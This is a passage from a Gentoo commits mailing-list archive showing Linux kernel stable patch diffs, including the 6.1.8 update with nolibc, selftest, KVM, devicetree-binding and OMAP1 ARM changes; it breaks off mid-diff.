++#define S_ISLNK(mode)  (((mode) & S_IFMT) == S_IFLNK)
++#define S_ISSOCK(mode) (((mode) & S_IFMT) == S_IFSOCK)
+ 
+ /* dirent types */
+ #define DT_UNKNOWN     0x0
+@@ -89,39 +89,46 @@
+ #define EXIT_SUCCESS 0
+ #define EXIT_FAILURE 1
+ 
++#define FD_SETIDXMASK (8 * sizeof(unsigned long))
++#define FD_SETBITMASK (8 * sizeof(unsigned long)-1)
++
+ /* for select() */
+ typedef struct {
+-	uint32_t fd32[(FD_SETSIZE + 31) / 32];
++	unsigned long fds[(FD_SETSIZE + FD_SETBITMASK) / FD_SETIDXMASK];
+ } fd_set;
+ 
+-#define FD_CLR(fd, set) do {                                            \
+-		fd_set *__set = (set);                                  \
+-		int __fd = (fd);                                        \
+-		if (__fd >= 0)                                          \
+-			__set->fd32[__fd / 32] &= ~(1U << (__fd & 31)); \
++#define FD_CLR(fd, set) do {						\
++		fd_set *__set = (set);					\
++		int __fd = (fd);					\
++		if (__fd >= 0)						\
++			__set->fds[__fd / FD_SETIDXMASK] &=		\
++				~(1U << (__fd & FX_SETBITMASK));	\
+ 	} while (0)
+ 
+-#define FD_SET(fd, set) do {                                            \
+-		fd_set *__set = (set);                                  \
+-		int __fd = (fd);                                        \
+-		if (__fd >= 0)                                          \
+-			__set->fd32[__fd / 32] |= 1U << (__fd & 31);    \
++#define FD_SET(fd, set) do {						\
++		fd_set *__set = (set);					\
++		int __fd = (fd);					\
++		if (__fd >= 0)						\
++			__set->fds[__fd / FD_SETIDXMASK] |=		\
++				1 << (__fd & FD_SETBITMASK);		\
+ 	} while (0)
+ 
+-#define FD_ISSET(fd, set) ({                                                  \
+-		fd_set *__set = (set);                                        \
+-		int __fd = (fd);                                              \
+-		int __r = 0;                                                  \
+-		if (__fd >= 0)                                                \
+-			__r = !!(__set->fd32[__fd / 32] & 1U << (__fd & 31)); \
+-		__r;                                                          \
++#define FD_ISSET(fd, set) ({						\
++			fd_set *__set = (set);				\
++			int __fd = (fd);				\
++		int __r = 0;						\
++		if (__fd >= 0)						\
++			__r = !!(__set->fds[__fd / FD_SETIDXMASK] &	\
++1U << (__fd & FD_SET_BITMASK));						\
++		__r;							\
+ 	})
+ 
+-#define FD_ZERO(set) do {                                               \
+-		fd_set *__set = (set);                                  \
+-		int __idx;                                              \
+-		for (__idx = 0; __idx < (FD_SETSIZE+31) / 32; __idx ++) \
+-			__set->fd32[__idx] = 0;                         \
++#define FD_ZERO(set) do {						\
++		fd_set *__set = (set);					\
++		int __idx;						\
++		int __size = (FD_SETSIZE+FD_SETBITMASK) / FD_SETIDXMASK;\
++		for (__idx = 0; __idx < __size; __idx++)		\
++			__set->fds[__idx] = 0;				\
+ 	} while (0)
+ 
+ /* for poll() */
+@@ -202,4 +209,7 @@ struct stat {
+ })
+ #endif
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_TYPES_H */
+diff --git a/tools/include/nolibc/unistd.h b/tools/include/nolibc/unistd.h
+index 1c25e20ee3606..1cfcd52106a42 100644
+--- a/tools/include/nolibc/unistd.h
++++ b/tools/include/nolibc/unistd.h
+@@ -51,4 +51,7 @@ int tcsetpgrp(int fd, pid_t pid)
+ 	return ioctl(fd, TIOCSPGRP, &pid);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_UNISTD_H */
+diff --git a/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c b/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
+deleted file mode 100644
+index 3add34df57678..0000000000000
+--- a/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
++++ /dev/null
+@@ -1,9 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-
+-#include <test_progs.h>
+-#include "jeq_infer_not_null_fail.skel.h"
+-
+-void test_jeq_infer_not_null(void)
+-{
+-	RUN_TESTS(jeq_infer_not_null_fail);
+-}
+diff --git a/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c b/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
+deleted file mode 100644
+index f46965053acb2..0000000000000
+--- a/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
++++ /dev/null
+@@ -1,42 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-
+-#include "vmlinux.h"
+-#include <bpf/bpf_helpers.h>
+-#include "bpf_misc.h"
+-
+-char _license[] SEC("license") = "GPL";
+-
+-struct {
+-	__uint(type, BPF_MAP_TYPE_HASH);
+-	__uint(max_entries, 1);
+-	__type(key, u64);
+-	__type(value, u64);
+-} m_hash SEC(".maps");
+-
+-SEC("?raw_tp")
+-__failure __msg("R8 invalid mem access 'map_value_or_null")
+-int jeq_infer_not_null_ptr_to_btfid(void *ctx)
+-{
+-	struct bpf_map *map = (struct bpf_map *)&m_hash;
+-	struct bpf_map *inner_map = map->inner_map_meta;
+-	u64 key = 0, ret = 0, *val;
+-
+-	val = bpf_map_lookup_elem(map, &key);
+-	/* Do not mark ptr as non-null if one of them is
+-	 * PTR_TO_BTF_ID (R9), reject because of invalid
+-	 * access to map value (R8).
+-	 *
+-	 * Here, we need to inline those insns to access
+-	 * R8 directly, since compiler may use other reg
+-	 * once it figures out val==inner_map.
+-	 */
+-	asm volatile("r8 = %[val];\n"
+-		     "r9 = %[inner_map];\n"
+-		     "if r8 != r9 goto +1;\n"
+-		     "%[ret] = *(u64 *)(r8 +0);\n"
+-		     : [ret] "+r"(ret)
+-		     : [inner_map] "r"(inner_map), [val] "r"(val)
+-		     : "r8", "r9");
+-
+-	return ret;
+-}
+diff --git a/tools/testing/selftests/net/toeplitz.c b/tools/testing/selftests/net/toeplitz.c
+index 90026a27eac0c..9ba03164d73a6 100644
+--- a/tools/testing/selftests/net/toeplitz.c
++++ b/tools/testing/selftests/net/toeplitz.c
+@@ -215,7 +215,7 @@ static char *recv_frame(const struct ring_state *ring, char *frame)
+ }
+ 
+ /* A single TPACKET_V3 block can hold multiple frames */
+-static void recv_block(struct ring_state *ring)
++static bool recv_block(struct ring_state *ring)
+ {
+ 	struct tpacket_block_desc *block;
+ 	char *frame;
+@@ -223,7 +223,7 @@ static void recv_block(struct ring_state *ring)
+ 
+ 	block = (void *)(ring->mmap + ring->idx * ring_block_sz);
+ 	if (!(block->hdr.bh1.block_status & TP_STATUS_USER))
+-		return;
++		return false;
+ 
+ 	frame = (char *)block;
+ 	frame += block->hdr.bh1.offset_to_first_pkt;
+@@ -235,6 +235,8 @@ static void recv_block(struct ring_state *ring)
+ 
+ 	block->hdr.bh1.block_status = TP_STATUS_KERNEL;
+ 	ring->idx = (ring->idx + 1) % ring_block_nr;
++
++	return true;
+ }
+ 
+ /* simple test: sleep once unconditionally and then process all rings */
+@@ -245,7 +247,7 @@ static void process_rings(void)
+ 	usleep(1000 * cfg_timeout_msec);
+ 
+ 	for (i = 0; i < num_cpus; i++)
+-		recv_block(&rings[i]);
++		do {} while (recv_block(&rings[i]));
+ 
+ 	fprintf(stderr, "count: pass=%u nohash=%u fail=%u\n",
+ 		frames_received - frames_nohash - frames_error,
+@@ -257,12 +259,12 @@ static char *setup_ring(int fd)
+ 	struct tpacket_req3 req3 = {0};
+ 	void *ring;
+ 
+-	req3.tp_retire_blk_tov = cfg_timeout_msec;
++	req3.tp_retire_blk_tov = cfg_timeout_msec / 8;
+ 	req3.tp_feature_req_word = TP_FT_REQ_FILL_RXHASH;
+ 
+ 	req3.tp_frame_size = 2048;
+ 	req3.tp_frame_nr = 1 << 10;
+-	req3.tp_block_nr = 2;
++	req3.tp_block_nr = 16;
+ 
+ 	req3.tp_block_size = req3.tp_frame_size * req3.tp_frame_nr;
+ 	req3.tp_block_size /= req3.tp_block_nr;
+diff --git a/virt/kvm/vfio.c b/virt/kvm/vfio.c
+index 495ceabffe88b..9584eb57e0eda 100644
+--- a/virt/kvm/vfio.c
++++ b/virt/kvm/vfio.c
+@@ -336,7 +336,7 @@ static int kvm_vfio_has_attr(struct kvm_device *dev,
+ 	return -ENXIO;
+ }
+ 
+-static void kvm_vfio_destroy(struct kvm_device *dev)
++static void kvm_vfio_release(struct kvm_device *dev)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+ 	struct kvm_vfio_group *kvg, *tmp;
+@@ -355,7 +355,7 @@ static void kvm_vfio_destroy(struct kvm_device *dev)
+ 	kvm_vfio_update_coherency(dev);
+ 
+ 	kfree(kv);
+-	kfree(dev); /* alloc by kvm_ioctl_create_device, free by .destroy */
++	kfree(dev); /* alloc by kvm_ioctl_create_device, free by .release */
+ }
+ 
+ static int kvm_vfio_create(struct kvm_device *dev, u32 type);
+@@ -363,7 +363,7 @@ static int kvm_vfio_create(struct kvm_device *dev, u32 type);
+ static struct kvm_device_ops kvm_vfio_ops = {
+ 	.name = "kvm-vfio",
+ 	.create = kvm_vfio_create,
+-	.destroy = kvm_vfio_destroy,
++	.release = kvm_vfio_release,
+ 	.set_attr = kvm_vfio_set_attr,
+ 	.has_attr = kvm_vfio_has_attr,
+ };


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-24  7:19 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-01-24  7:19 UTC (permalink / raw
  To: gentoo-commits

commit:     a7e1722d1d75744592599e63e49a84ad72e66cfc
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Tue Jan 24 07:18:40 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Tue Jan 24 07:19:13 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a7e1722d

Linux patch 6.1.8

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1007_linux-6.1.8.patch | 6638 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6642 insertions(+)

diff --git a/0000_README b/0000_README
index b3e83a42..396dd2ee 100644
--- a/0000_README
+++ b/0000_README
@@ -71,6 +71,10 @@ Patch:  1006_linux-6.1.7.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.7
 
+Patch:  1007_linux-6.1.8.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.8
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1007_linux-6.1.8.patch b/1007_linux-6.1.8.patch
new file mode 100644
index 00000000..bdd0484e
--- /dev/null
+++ b/1007_linux-6.1.8.patch
@@ -0,0 +1,6638 @@
+diff --git a/Documentation/ABI/testing/sysfs-kernel-oops_count b/Documentation/ABI/testing/sysfs-kernel-oops_count
+new file mode 100644
+index 0000000000000..156cca9dbc960
+--- /dev/null
++++ b/Documentation/ABI/testing/sysfs-kernel-oops_count
+@@ -0,0 +1,6 @@
++What:		/sys/kernel/oops_count
++Date:		November 2022
++KernelVersion:	6.2.0
++Contact:	Linux Kernel Hardening List <linux-hardening@vger.kernel.org>
++Description:
++		Shows how many times the system has Oopsed since last boot.
+diff --git a/Documentation/ABI/testing/sysfs-kernel-warn_count b/Documentation/ABI/testing/sysfs-kernel-warn_count
+new file mode 100644
+index 0000000000000..90a029813717d
+--- /dev/null
++++ b/Documentation/ABI/testing/sysfs-kernel-warn_count
+@@ -0,0 +1,6 @@
++What:		/sys/kernel/warn_count
++Date:		November 2022
++KernelVersion:	6.2.0
++Contact:	Linux Kernel Hardening List <linux-hardening@vger.kernel.org>
++Description:
++		Shows how many times the system has Warned since last boot.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index c2c64c1b706ff..b3588fff1ec0a 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -667,6 +667,15 @@ This is the default behavior.
+ an oops event is detected.
+ 
+ 
++oops_limit
++==========
++
++Number of kernel oopses after which the kernel should panic when
++``panic_on_oops`` is not set. Setting this to 0 disables checking
++the count. Setting this to  1 has the same effect as setting
++``panic_on_oops=1``. The default value is 10000.
++
++
+ osrelease, ostype & version
+ ===========================
+ 
+@@ -1523,6 +1532,16 @@ entry will default to 2 instead of 0.
+ 2 Unprivileged calls to ``bpf()`` are disabled
+ = =============================================================
+ 
++
++warn_limit
++==========
++
++Number of kernel warnings after which the kernel should panic when
++``panic_on_warn`` is not set. Setting this to 0 disables checking
++the warning count. Setting this to 1 has the same effect as setting
++``panic_on_warn=1``. The default value is 0.
++
++
+ watchdog
+ ========
+ 
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,g12a-usb2-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb2-phy.yaml
+new file mode 100644
+index 0000000000000..bb01c6b34dabc
+--- /dev/null
++++ b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb2-phy.yaml
+@@ -0,0 +1,78 @@
++# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
++# Copyright 2019 BayLibre, SAS
++%YAML 1.2
++---
++$id: "http://devicetree.org/schemas/phy/amlogic,g12a-usb2-phy.yaml#"
++$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++
++title: Amlogic G12A USB2 PHY
++
++maintainers:
++  - Neil Armstrong <neil.armstrong@linaro.org>
++
++properties:
++  compatible:
++    enum:
++      - amlogic,g12a-usb2-phy
++      - amlogic,a1-usb2-phy
++
++  reg:
++    maxItems: 1
++
++  clocks:
++    maxItems: 1
++
++  clock-names:
++    items:
++      - const: xtal
++
++  resets:
++    maxItems: 1
++
++  reset-names:
++    items:
++      - const: phy
++
++  "#phy-cells":
++    const: 0
++
++  phy-supply:
++    description:
++      Phandle to a regulator that provides power to the PHY. This
++      regulator will be managed during the PHY power on/off sequence.
++
++required:
++  - compatible
++  - reg
++  - clocks
++  - clock-names
++  - resets
++  - reset-names
++  - "#phy-cells"
++
++if:
++  properties:
++    compatible:
++      enum:
++        - amlogic,meson-a1-usb-ctrl
++
++then:
++  properties:
++    power-domains:
++      maxItems: 1
++  required:
++    - power-domains
++
++additionalProperties: false
++
++examples:
++  - |
++    phy@36000 {
++          compatible = "amlogic,g12a-usb2-phy";
++          reg = <0x36000 0x2000>;
++          clocks = <&xtal>;
++          clock-names = "xtal";
++          resets = <&phy_reset>;
++          reset-names = "phy";
++          #phy-cells = <0>;
++    };
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,g12a-usb3-pcie-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb3-pcie-phy.yaml
+new file mode 100644
+index 0000000000000..129d26e99776b
+--- /dev/null
++++ b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb3-pcie-phy.yaml
+@@ -0,0 +1,59 @@
++# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
++# Copyright 2019 BayLibre, SAS
++%YAML 1.2
++---
++$id: "http://devicetree.org/schemas/phy/amlogic,g12a-usb3-pcie-phy.yaml#"
++$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++
++title: Amlogic G12A USB3 + PCIE Combo PHY
++
++maintainers:
++  - Neil Armstrong <neil.armstrong@linaro.org>
++
++properties:
++  compatible:
++    enum:
++      - amlogic,g12a-usb3-pcie-phy
++
++  reg:
++    maxItems: 1
++
++  clocks:
++    maxItems: 1
++
++  clock-names:
++    items:
++      - const: ref_clk
++
++  resets:
++    maxItems: 1
++
++  reset-names:
++    items:
++      - const: phy
++
++  "#phy-cells":
++    const: 1
++
++required:
++  - compatible
++  - reg
++  - clocks
++  - clock-names
++  - resets
++  - reset-names
++  - "#phy-cells"
++
++additionalProperties: false
++
++examples:
++  - |
++    phy@46000 {
++          compatible = "amlogic,g12a-usb3-pcie-phy";
++          reg = <0x46000 0x2000>;
++          clocks = <&ref_clk>;
++          clock-names = "ref_clk";
++          resets = <&phy_reset>;
++          reset-names = "phy";
++          #phy-cells = <1>;
++    };
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb2-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb2-phy.yaml
+deleted file mode 100644
+index f3a5fbabbbb59..0000000000000
+--- a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb2-phy.yaml
++++ /dev/null
+@@ -1,78 +0,0 @@
+-# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+-# Copyright 2019 BayLibre, SAS
+-%YAML 1.2
+----
+-$id: "http://devicetree.org/schemas/phy/amlogic,meson-g12a-usb2-phy.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
+-
+-title: Amlogic G12A USB2 PHY
+-
+-maintainers:
+-  - Neil Armstrong <neil.armstrong@linaro.org>
+-
+-properties:
+-  compatible:
+-    enum:
+-      - amlogic,meson-g12a-usb2-phy
+-      - amlogic,meson-a1-usb2-phy
+-
+-  reg:
+-    maxItems: 1
+-
+-  clocks:
+-    maxItems: 1
+-
+-  clock-names:
+-    items:
+-      - const: xtal
+-
+-  resets:
+-    maxItems: 1
+-
+-  reset-names:
+-    items:
+-      - const: phy
+-
+-  "#phy-cells":
+-    const: 0
+-
+-  phy-supply:
+-    description:
+-      Phandle to a regulator that provides power to the PHY. This
+-      regulator will be managed during the PHY power on/off sequence.
+-
+-required:
+-  - compatible
+-  - reg
+-  - clocks
+-  - clock-names
+-  - resets
+-  - reset-names
+-  - "#phy-cells"
+-
+-if:
+-  properties:
+-    compatible:
+-      enum:
+-        - amlogic,meson-a1-usb-ctrl
+-
+-then:
+-  properties:
+-    power-domains:
+-      maxItems: 1
+-  required:
+-    - power-domains
+-
+-additionalProperties: false
+-
+-examples:
+-  - |
+-    phy@36000 {
+-          compatible = "amlogic,meson-g12a-usb2-phy";
+-          reg = <0x36000 0x2000>;
+-          clocks = <&xtal>;
+-          clock-names = "xtal";
+-          resets = <&phy_reset>;
+-          reset-names = "phy";
+-          #phy-cells = <0>;
+-    };
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml
+deleted file mode 100644
+index 868b4e6fde71f..0000000000000
+--- a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml
++++ /dev/null
+@@ -1,59 +0,0 @@
+-# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+-# Copyright 2019 BayLibre, SAS
+-%YAML 1.2
+----
+-$id: "http://devicetree.org/schemas/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
+-
+-title: Amlogic G12A USB3 + PCIE Combo PHY
+-
+-maintainers:
+-  - Neil Armstrong <neil.armstrong@linaro.org>
+-
+-properties:
+-  compatible:
+-    enum:
+-      - amlogic,meson-g12a-usb3-pcie-phy
+-
+-  reg:
+-    maxItems: 1
+-
+-  clocks:
+-    maxItems: 1
+-
+-  clock-names:
+-    items:
+-      - const: ref_clk
+-
+-  resets:
+-    maxItems: 1
+-
+-  reset-names:
+-    items:
+-      - const: phy
+-
+-  "#phy-cells":
+-    const: 1
+-
+-required:
+-  - compatible
+-  - reg
+-  - clocks
+-  - clock-names
+-  - resets
+-  - reset-names
+-  - "#phy-cells"
+-
+-additionalProperties: false
+-
+-examples:
+-  - |
+-    phy@46000 {
+-          compatible = "amlogic,meson-g12a-usb3-pcie-phy";
+-          reg = <0x46000 0x2000>;
+-          clocks = <&ref_clk>;
+-          clock-names = "ref_clk";
+-          resets = <&phy_reset>;
+-          reset-names = "phy";
+-          #phy-cells = <1>;
+-    };
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 886d3f69ee644..d4822ae39e396 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -11112,6 +11112,8 @@ M:	Kees Cook <keescook@chromium.org>
+ L:	linux-hardening@vger.kernel.org
+ S:	Supported
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/kees/linux.git for-next/hardening
++F:	Documentation/ABI/testing/sysfs-kernel-oops_count
++F:	Documentation/ABI/testing/sysfs-kernel-warn_count
+ F:	include/linux/overflow.h
+ F:	include/linux/randomize_kstack.h
+ F:	mm/usercopy.c
+diff --git a/Makefile b/Makefile
+index 7eb6793ecfbfd..49261450039a1 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 7
++SUBLEVEL = 8
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts b/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts
+index 44cd72f1b1be4..116e59a3b76d0 100644
+--- a/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts
++++ b/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts
+@@ -19,16 +19,16 @@
+ 		serial@f995e000 {
+ 			status = "okay";
+ 		};
++	};
++};
+ 
+-		sdhci@f9824900 {
+-			bus-width = <8>;
+-			non-removable;
+-			status = "okay";
+-		};
++&sdhc_1 {
++	bus-width = <8>;
++	non-removable;
++	status = "okay";
++};
+ 
+-		sdhci@f98a4900 {
+-			cd-gpios = <&tlmm 122 GPIO_ACTIVE_LOW>;
+-			bus-width = <4>;
+-		};
+-	};
++&sdhc_2 {
++	cd-gpios = <&tlmm 122 GPIO_ACTIVE_LOW>;
++	bus-width = <4>;
+ };
+diff --git a/arch/arm/boot/dts/qcom-apq8084.dtsi b/arch/arm/boot/dts/qcom-apq8084.dtsi
+index f2fb7c975af84..69da87577ad0d 100644
+--- a/arch/arm/boot/dts/qcom-apq8084.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8084.dtsi
+@@ -419,7 +419,7 @@
+ 			status = "disabled";
+ 		};
+ 
+-		mmc@f9824900 {
++		sdhc_1: mmc@f9824900 {
+ 			compatible = "qcom,apq8084-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0xf9824900 0x11c>, <0xf9824000 0x800>;
+ 			reg-names = "hc", "core";
+@@ -432,7 +432,7 @@
+ 			status = "disabled";
+ 		};
+ 
+-		mmc@f98a4900 {
++		sdhc_2: mmc@f98a4900 {
+ 			compatible = "qcom,apq8084-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0xf98a4900 0x11c>, <0xf98a4000 0x800>;
+ 			reg-names = "hc", "core";
+diff --git a/arch/arm/mach-omap1/Kconfig b/arch/arm/mach-omap1/Kconfig
+index 538a960257cc7..7ec7ada287e05 100644
+--- a/arch/arm/mach-omap1/Kconfig
++++ b/arch/arm/mach-omap1/Kconfig
+@@ -4,6 +4,7 @@ menuconfig ARCH_OMAP1
+ 	depends on ARCH_MULTI_V4T || ARCH_MULTI_V5
+ 	depends on CPU_LITTLE_ENDIAN
+ 	depends on ATAGS
++	select ARCH_OMAP
+ 	select ARCH_HAS_HOLES_MEMORYMODEL
+ 	select ARCH_OMAP
+ 	select CLKSRC_MMIO
+@@ -45,10 +46,6 @@ config ARCH_OMAP16XX
+ 	select CPU_ARM926T
+ 	select OMAP_DM_TIMER
+ 
+-config ARCH_OMAP1_ANY
+-	select ARCH_OMAP
+-	def_bool ARCH_OMAP730 || ARCH_OMAP850 || ARCH_OMAP15XX || ARCH_OMAP16XX
+-
+ config ARCH_OMAP
+ 	bool
+ 
+diff --git a/arch/arm/mach-omap1/Makefile b/arch/arm/mach-omap1/Makefile
+index 506074b86333f..0615cb0ba580b 100644
+--- a/arch/arm/mach-omap1/Makefile
++++ b/arch/arm/mach-omap1/Makefile
+@@ -3,8 +3,6 @@
+ # Makefile for the linux kernel.
+ #
+ 
+-ifdef CONFIG_ARCH_OMAP1_ANY
+-
+ # Common support
+ obj-y := io.o id.o sram-init.o sram.o time.o irq.o mux.o flash.o \
+ 	 serial.o devices.o dma.o omap-dma.o fb.o
+@@ -59,5 +57,3 @@ obj-$(CONFIG_ARCH_OMAP730)		+= gpio7xx.o
+ obj-$(CONFIG_ARCH_OMAP850)		+= gpio7xx.o
+ obj-$(CONFIG_ARCH_OMAP15XX)		+= gpio15xx.o
+ obj-$(CONFIG_ARCH_OMAP16XX)		+= gpio16xx.o
+-
+-endif
+diff --git a/arch/arm/mach-omap1/io.c b/arch/arm/mach-omap1/io.c
+index d2db9b8aed3fb..0074b011a05a4 100644
+--- a/arch/arm/mach-omap1/io.c
++++ b/arch/arm/mach-omap1/io.c
+@@ -22,17 +22,14 @@
+  * The machine specific code may provide the extra mapping besides the
+  * default mapping provided here.
+  */
+-static struct map_desc omap_io_desc[] __initdata = {
++#if defined (CONFIG_ARCH_OMAP730) || defined (CONFIG_ARCH_OMAP850)
++static struct map_desc omap7xx_io_desc[] __initdata = {
+ 	{
+ 		.virtual	= OMAP1_IO_VIRT,
+ 		.pfn		= __phys_to_pfn(OMAP1_IO_PHYS),
+ 		.length		= OMAP1_IO_SIZE,
+ 		.type		= MT_DEVICE
+-	}
+-};
+-
+-#if defined (CONFIG_ARCH_OMAP730) || defined (CONFIG_ARCH_OMAP850)
+-static struct map_desc omap7xx_io_desc[] __initdata = {
++	},
+ 	{
+ 		.virtual	= OMAP7XX_DSP_BASE,
+ 		.pfn		= __phys_to_pfn(OMAP7XX_DSP_START),
+@@ -49,6 +46,12 @@ static struct map_desc omap7xx_io_desc[] __initdata = {
+ 
+ #ifdef CONFIG_ARCH_OMAP15XX
+ static struct map_desc omap1510_io_desc[] __initdata = {
++	{
++		.virtual	= OMAP1_IO_VIRT,
++		.pfn		= __phys_to_pfn(OMAP1_IO_PHYS),
++		.length		= OMAP1_IO_SIZE,
++		.type		= MT_DEVICE
++	},
+ 	{
+ 		.virtual	= OMAP1510_DSP_BASE,
+ 		.pfn		= __phys_to_pfn(OMAP1510_DSP_START),
+@@ -65,6 +68,12 @@ static struct map_desc omap1510_io_desc[] __initdata = {
+ 
+ #if defined(CONFIG_ARCH_OMAP16XX)
+ static struct map_desc omap16xx_io_desc[] __initdata = {
++	{
++		.virtual	= OMAP1_IO_VIRT,
++		.pfn		= __phys_to_pfn(OMAP1_IO_PHYS),
++		.length		= OMAP1_IO_SIZE,
++		.type		= MT_DEVICE
++	},
+ 	{
+ 		.virtual	= OMAP16XX_DSP_BASE,
+ 		.pfn		= __phys_to_pfn(OMAP16XX_DSP_START),
+@@ -79,18 +88,9 @@ static struct map_desc omap16xx_io_desc[] __initdata = {
+ };
+ #endif
+ 
+-/*
+- * Maps common IO regions for omap1
+- */
+-static void __init omap1_map_common_io(void)
+-{
+-	iotable_init(omap_io_desc, ARRAY_SIZE(omap_io_desc));
+-}
+-
+ #if defined (CONFIG_ARCH_OMAP730) || defined (CONFIG_ARCH_OMAP850)
+ void __init omap7xx_map_io(void)
+ {
+-	omap1_map_common_io();
+ 	iotable_init(omap7xx_io_desc, ARRAY_SIZE(omap7xx_io_desc));
+ }
+ #endif
+@@ -98,7 +98,6 @@ void __init omap7xx_map_io(void)
+ #ifdef CONFIG_ARCH_OMAP15XX
+ void __init omap15xx_map_io(void)
+ {
+-	omap1_map_common_io();
+ 	iotable_init(omap1510_io_desc, ARRAY_SIZE(omap1510_io_desc));
+ }
+ #endif
+@@ -106,7 +105,6 @@ void __init omap15xx_map_io(void)
+ #if defined(CONFIG_ARCH_OMAP16XX)
+ void __init omap16xx_map_io(void)
+ {
+-	omap1_map_common_io();
+ 	iotable_init(omap16xx_io_desc, ARRAY_SIZE(omap16xx_io_desc));
+ }
+ #endif
+diff --git a/arch/arm/mach-omap1/mcbsp.c b/arch/arm/mach-omap1/mcbsp.c
+index 05c25c432449f..b1632cbe37e6f 100644
+--- a/arch/arm/mach-omap1/mcbsp.c
++++ b/arch/arm/mach-omap1/mcbsp.c
+@@ -89,7 +89,6 @@ static struct omap_mcbsp_ops omap1_mcbsp_ops = {
+ #define OMAP1610_MCBSP2_BASE	0xfffb1000
+ #define OMAP1610_MCBSP3_BASE	0xe1017000
+ 
+-#if defined(CONFIG_ARCH_OMAP730) || defined(CONFIG_ARCH_OMAP850)
+ struct resource omap7xx_mcbsp_res[][6] = {
+ 	{
+ 		{
+@@ -159,14 +158,7 @@ static struct omap_mcbsp_platform_data omap7xx_mcbsp_pdata[] = {
+ };
+ #define OMAP7XX_MCBSP_RES_SZ		ARRAY_SIZE(omap7xx_mcbsp_res[1])
+ #define OMAP7XX_MCBSP_COUNT		ARRAY_SIZE(omap7xx_mcbsp_res)
+-#else
+-#define omap7xx_mcbsp_res_0		NULL
+-#define omap7xx_mcbsp_pdata		NULL
+-#define OMAP7XX_MCBSP_RES_SZ		0
+-#define OMAP7XX_MCBSP_COUNT		0
+-#endif
+ 
+-#ifdef CONFIG_ARCH_OMAP15XX
+ struct resource omap15xx_mcbsp_res[][6] = {
+ 	{
+ 		{
+@@ -266,14 +258,7 @@ static struct omap_mcbsp_platform_data omap15xx_mcbsp_pdata[] = {
+ };
+ #define OMAP15XX_MCBSP_RES_SZ		ARRAY_SIZE(omap15xx_mcbsp_res[1])
+ #define OMAP15XX_MCBSP_COUNT		ARRAY_SIZE(omap15xx_mcbsp_res)
+-#else
+-#define omap15xx_mcbsp_res_0		NULL
+-#define omap15xx_mcbsp_pdata		NULL
+-#define OMAP15XX_MCBSP_RES_SZ		0
+-#define OMAP15XX_MCBSP_COUNT		0
+-#endif
+ 
+-#ifdef CONFIG_ARCH_OMAP16XX
+ struct resource omap16xx_mcbsp_res[][6] = {
+ 	{
